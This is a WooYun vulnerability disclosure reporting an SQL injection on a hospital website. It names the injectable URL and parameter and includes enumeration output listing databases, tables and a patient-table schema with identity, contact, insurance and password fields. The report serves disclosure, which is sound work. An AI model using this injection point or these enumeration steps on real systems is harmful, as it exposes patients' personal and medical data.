WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
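2015-02-13: Details reported to the vendor; awaiting vendor handling
2015-02-17: Vendor confirmed; details disclosed to the vendor only
2015-02-27: Details disclosed to core white hats and experts in related fields
2015-03-09: Details disclosed to regular white hats
2015-03-19: Details disclosed to trainee white hats
2015-03-30: Details disclosed to the public
SQL injection vulnerability at a provincial-level Grade-A key hospital leaks a large amount of citizens' information, including names, ID card numbers, contact phone numbers, medical insurance card numbers, etc. (several hundred thousand records involved)
Injection point: http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374
Injected parameter: pid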
Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_RESET                      |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

Database: jdyyeb
[4 tables]
+---------------------------------------+
| about                                 |
| about_class                           |
| adclass                               |
| config_class                          |
+---------------------------------------+
A large amount of citizens' information is leaked:
There are many more; they are not listed one by one.
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| BorthAddress    | varchar  |
| CARD            | varchar  |
| CKDate          | datetime |
| Class1_ID       | varchar  |
| Class1_R        | varchar  |
| Class2_ID       | varchar  |
| Class2_R        | varchar  |
| Class3_ID       | varchar  |
| Class3_R        | varchar  |
| Clinic_No       | varchar  |
| Contract_ID     | varchar  |
| Count_Flag      | varchar  |
| Count_Flag_Date | datetime |
| Count_Status    | varchar  |
| CSNY            | datetime |
| CYRQ            | datetime |
| DJCount         | int      |
| DJJE            | money    |
| DJModi          | varchar  |
| DJXM            | text     |
| DJYS            | varchar  |
| DWDM            | varchar  |
| DWFZDM          | varchar  |
| Email           | varchar  |
| ETDate          | datetime |
| GB              | varchar  |
| GH              | varchar  |
| GRDNH           | varchar  |
| GWDM            | varchar  |
| GZDM            | varchar  |
| GZKS            | text     |
| HF              | varchar  |
| HISGroupSFID    | varchar  |
| HisTFBJ         | varchar  |
| Hosptial_No     | varchar  |
| HSDate          | datetime |
| HSYS            | varchar  |
| HYXM            | text     |
| ID              | varchar  |
| IFSend          | varchar  |
| IFUpDown        | varchar  |
| InsureSeriesID  | varchar  |
| JCLB            | varchar  |
| JCRQ            | datetime |
| JCXM            | text     |
| JDRQ            | datetime |
| JE              | money    |
| JLYS            | varchar  |
| JZSFFS          | varchar  |
| LastModiDate    | datetime |
| LastModiYS      | varchar  |
| LXDH            | varchar  |
| Medical_No      | varchar  |
| MZ              | varchar  |
| NEWDJXM         | text     |
| Notices         | varchar  |
| NOWJE           | money    |
| NOWSSJE         | money    |
| OperaID         | varchar  |
| PACS_EIS        | varchar  |
| PACSXM          | text     |
| PassWord        | varchar  |
| PHOTO           | image    |
| PntBarCode      | int      |
| PntBarCodeTime  | datetime |
| PrintCount      | int      |
| PrintDate       | datetime |
| PrintYS         | varchar  |
| QUEUEID         | varchar  |
| RCardDate       | datetime |
| RCardFlag       | varchar  |
| ReCall          | varchar  |
| SendWhere       | varchar  |
| SFBJ            | varchar  |
| SFYS            | varchar  |
| SFZH            | varchar  |
| SpecialFlag     | varchar  |
| SQYS            | varchar  |
| SSJE            | money    |
| SSQX            | varchar  |
| SSSS            | varchar  |
| TJFB            | varchar  |
| TXDZ            | varchar  |
| updateState     | varchar  |
| updatesuccess   | varchar  |
| updatetime      | varchar  |
| UpDownTime      | datetime |
| VIPID           | varchar  |
| WCKS            | text     |
| WCXM            | text     |
| WHCD            | varchar  |
| XB              | varchar  |
| XFXM            | text     |
| XJJE            | money    |
| XJJE1           | money    |
| XJJE10          | money    |
| XJJE11          | money    |
| XJJE12          | money    |
| XJJE13          | money    |
| XJJE14          | money    |
| XJJE15          | money    |
| XJJE2           | money    |
| XJJE3           | money    |
| XJJE4           | money    |
| XJJE5           | money    |
| XJJE6           | money    |
| XJJE7           | money    |
| XJJE8           | money    |
| XJJE9           | money    |
| XM              | varchar  |
| YCXM            | text     |
| YSFBJ           | varchar  |
| ZHXMDM          | varchar  |
| ZJDCRQ          | datetime |
| ZJDCYS          | varchar  |
| ZJE             | money    |
| ZJHM            | varchar  |
| ZKL             | float    |
| ZY              | varchar  |
+-----------------+----------+
Proven.
Filter.
Severity: High
Vulnerability Rank: 12
Confirmation time: 2015-02-17 08:24
None yet.